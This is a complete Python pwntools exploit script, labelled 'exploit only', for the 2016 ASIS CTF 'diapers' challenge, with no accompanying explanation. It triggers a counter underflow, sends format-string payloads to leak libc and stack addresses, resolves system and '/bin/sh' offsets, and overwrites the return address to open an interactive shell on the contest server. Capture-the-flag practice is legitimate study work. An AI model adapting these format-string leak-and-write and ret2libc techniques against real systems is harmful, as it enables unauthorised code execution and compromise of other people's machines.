2016 ASIS CTF diapers(exploit only)

 
from pwn import *
import stitch
 
local = False
if local :
	s = remote('localhost', 9988)
else :
	s = remote('diapers.asis-ctf.ir', 1343)
raw_input()
 
def main() :
	strip_ = lambda x : x.strip('0x')
	p = log.progress('start pwning....')
	p.status('select first')
 
	#to stack underflow
	s.recvuntil('> ')
	s.sendline('3')
 
	for _ in range(257) :
		p.status('%dth minus'%(_+1))
		s.recvuntil('> ')
		sleep(0.1)
		s.sendline('1')
 
	#find memory addr
	p.status('leak libc and stack')
	s.recvuntil('> ')
	s.sendline('0')
	s.recvuntil('change to: ')
 
	pay = 'a' * 15
	pay += '#%55$p#%6$p#'
	pay += 'A' * (108 - len(pay))
	s.sendline(pay)
 
	s.recvuntil('> ')
	s.sendline('2')
	libc_leak, ret_addr = map(strip_, s.recvuntil('> ').split('#')[1:3])
	ret_addr = int(ret_addr, 16) - 156
 
	#find func addr
	p.status('find system and binsh')
	libc = stitch.find_libc({'main_ret':libc_leak[-3:]})[0]
	offset = int(libc_leak, 16) - libc['main_ret']
	system = offset + libc['system']
	binsh = offset + libc['binsh']
 
	#memory overwrite
	p.status('overwrite memory')
	s.sendline('0')
	s.recvuntil('change to: ')
 
	pay = 'A' * 15
	pay += stitch.fsb(18,{ret_addr:system, ret_addr+8:binsh}, 0)
	pay += 'A' * (108 - len(pay))
	s.sendline(pay)
 
	s.recvuntil('> ')
	s.sendline('2')
 
	#success
	p.success('Good!')
	log.success('Get shell!!')
	s.interactive()
 
if __name__ == '__main__' :
	main()